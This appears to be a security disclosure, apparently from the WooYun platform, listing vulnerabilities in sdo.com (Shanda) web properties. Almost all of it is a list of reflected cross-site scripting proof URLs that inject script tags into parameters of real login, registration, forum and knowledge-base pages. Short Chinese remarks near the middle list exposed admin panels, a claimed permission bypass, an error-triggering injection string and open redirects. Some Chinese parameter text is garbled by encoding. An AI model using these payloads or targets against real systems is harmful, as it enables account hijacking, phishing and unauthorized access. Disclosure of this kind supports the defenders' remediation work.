http://cy.sdo.com/bbs/member.php?action=lostpasswd&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/2fly_gift.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282847615%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/forumdisplay.php?fid=24&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282950003%29%3B%3C/script%3E&cookietime=2592000
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString='"><script>alert(0513467);</script><"&idx=13045
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString='"><script>alert(3721571);</script><"&idx=13046
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString='"><script>alert(0426668);</script><"&idx=13047
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString='"><script>alert(2149265);</script><"&idx=13048
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString=1&idx='"><script>alert(2149265);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString='"><script>alert(5355054);</script><"&idx=13049
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString=1&idx='"><script>alert(8551854);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString=1&idx='"><script>alert(7809430);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString='"><script>alert(0876530);</script><"&idx=13063
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString='"><script>alert(3393352);</script><"&idx=13064
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString='"><script>alert(9668415);</script><"&idx=13068
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString='"><script>alert(1802440);</script><"&idx=13070
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString=1&idx='"><script>alert(1802440);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString=1&idx='"><script>alert(5912402);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString='"><script>alert(5912402);</script><"&idx=13072
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString='"><script>alert(7535048);</script><"&idx=13067
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString='"><script>alert(2957539);</script><"&idx=13071
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString=1&idx='"><script>alert(6642383);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString=1&idx='"><script>alert(1376727);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString='"><script>alert(4583426);</script><"&idx=13089
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString='"><script>alert(4583426);</script><"&idx=13093
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString='"><script>alert(4583426);</script><"&idx=13091
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString='"><script>alert(0869258);</script><"&idx=13092
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString='"><script>alert(3252579);</script><"&idx=13088
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString='"><script>alert(3252579);</script><"&idx=13094
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString='"><script>alert(3252579);</script><"&idx=13090
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString='"><script>alert(2412714);</script><"&idx=13095
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString=1&idx='"><script>alert(2412714);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString=1&idx='"><script>alert(9834013);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString='"><script>alert(1940913);</script><"&idx=13085
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString='"><script>alert(4148512);</script><"&idx=13087
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString=1&idx='"><script>alert(4148512);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString=1&idx='"><script>alert(7253211);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString='"><script>alert(7253211);</script><"&idx=13082
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString='"><script>alert(7253211);</script><"&idx=13080
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString='"><script>alert(3677700);</script><"&idx=13078
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString='"><script>alert(3677700);</script><"&idx=13083
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString='"><script>alert(6772400);</script><"&idx=13079
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString='"><script>alert(9989100);</script><"&idx=13075
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString='"><script>alert(9989100);</script><"&idx=13076
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString=1&idx='"><script>alert(8398393);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString='"><script>alert(8398393);</script><"&idx=12545
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString='"><script>alert(4711708);</script><"&idx=12548
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString='"><script>alert(5192521);</script><"&idx=13077
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString='"><script>alert(7818584);</script><"&idx=12554
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString=1&idx='"><script>alert(2417275);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString='"><script>alert(2417275);</script><"&idx=12549
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString=1&idx='"><script>alert(6237560);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString=1&idx='"><script>alert(9544396);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString='"><script>alert(1659680);</script><"&idx=12555
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString=1&idx='"><script>alert(1659680);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString='"><script>alert(8625956);</script><"&idx=13074
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString='"><script>alert(0069195);</script><"&idx=12556
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString='"><script>alert(7391693);</script><"&idx=13052
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString='"><script>alert(6993830);</script><"&idx=13058
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString=1&idx='"><script>alert(2748299);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString='"><script>alert(5808828);</script><"&idx=13056
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString='"><script>alert(5808828);</script><"&idx=13055
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString=1&idx='"><script>alert(9008591);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString='"><script>alert(9008591);</script><"&idx=13057
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString='"><script>alert(9008591);</script><"&idx=13060
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString='"><script>alert(1104182);</script><"&idx=13061
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString='"><script>alert(4328142);</script><"&idx=13062
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString=1&idx='"><script>alert(8527681);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]='"><script>alert(0633370);</script><"&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString='"><script>alert(6468769);</script><"&idx=13059
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]='"><script>alert(5475785);</script><"&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString=1&idx='"><script>alert(1788377);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle='"><script>alert(1756743);</script><"&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString=1&idx='"><script>alert(8671678);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID='"><script>alert(1922464);</script><"&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString='"><script>alert(0341653);</script><"&idx=11997
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString=1&idx='"><script>alert(7655439);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType='"><script>alert(7655439);</script><"&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString='"><script>alert(9616427);</script><"&idx=12000
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString=1&idx='"><script>alert(8834649);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=';</script><script>alert(3012439);</script>&originalReferenceMedia=
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=';</script><script>alert(7373225);</script>
http://gui.sdo.com/admin/
http://kk.sdo.com/admin/
http://cy.sdo.com/200909/admin/ 这个我知道你们下线了,但是迟迟不把他下线,所以还是发出来!
还有上传页面比较多,我就不一一去看了。
http://in.sdo.com/wp-login.php  盛大创新学院
http://image.help.sdo.com/index.php 图片管理系统
http://icamp.sdo.com/manage/  权限绕过。嘎嘎
报错
http://bb.sdo.com/search.aspx?categoryid=%27%22%27%22%29%3b%7c%5d*%7b%250d%250a%3C%2500%3E&categoryname=%E8%89%BA%E6%9C%AF&page=4&searchtype=ebook
url跳转
http://sndasdopassport.sdo.com/sdodownload/passport/SNDAHomepage/SNDANavigator.aspx?From=1000Y.SDO.COM&Panel=HOME_NEWSBAR&To=http://www.wooyun.org


http://txz.sdo.com/ssologin.aspx?a=a&CasBackUrl=http://wooyun.org

漏洞证明:







http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId='"><script>alert(2037769);</script><"&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid='"><script>alert(5144459);</script><"&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx='"><script>alert(1556958);</script><"&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(4662558);</script><"&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType='"><script>alert(4127734);</script><"&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://app.help.sdo.com/sdohelp.ashx?gameid=200012500&area=4000&type=3&maxlen=10&maxnum=4&src='"><script>alert(9968761);</script><"&ver=0
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone='"><script>alert(6504626);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType='"><script>alert(8684335);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid='"><script>alert(5536731);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://cy.sdo.com/bbs/?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287161522%29%3B%3C/script%3E&cookietime=2592000
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid='"><script>alert(8207517);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001='"><script>alert(7736705);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(5674032);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(1022590);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(0541698);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(5374185);</script><"&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(3302573);</script><"&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(0268717);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid='"><script>alert(9291599);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype='"><script>alert(4401657);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner='"><script>alert(3207573);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype='"><script>alert(0399132);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1523222);</script><"&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3169019);</script><"&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
https://cas.sdo.com/cas/loginStateService?method='"><script>alert(5794917);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(4349020);</script><"&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId='"><script>alert(6740555);</script><"&appArea=0&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(1806599);</script><"&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea='"><script>alert(2257886);</script><"&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2='"><script>alert(8264758);</script><"&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection='"><script>alert(1415861);</script><"&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId='"><script>alert(3646133);</script><"&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId='"><script>alert(7313563);</script><"
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId='"><script>alert(5504003);</script><"&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
https://cas.sdo.com/cas/login?service='"><script>alert(1926402);</script><"&gateway=true
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid='"><script>alert(3542305);</script><"&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
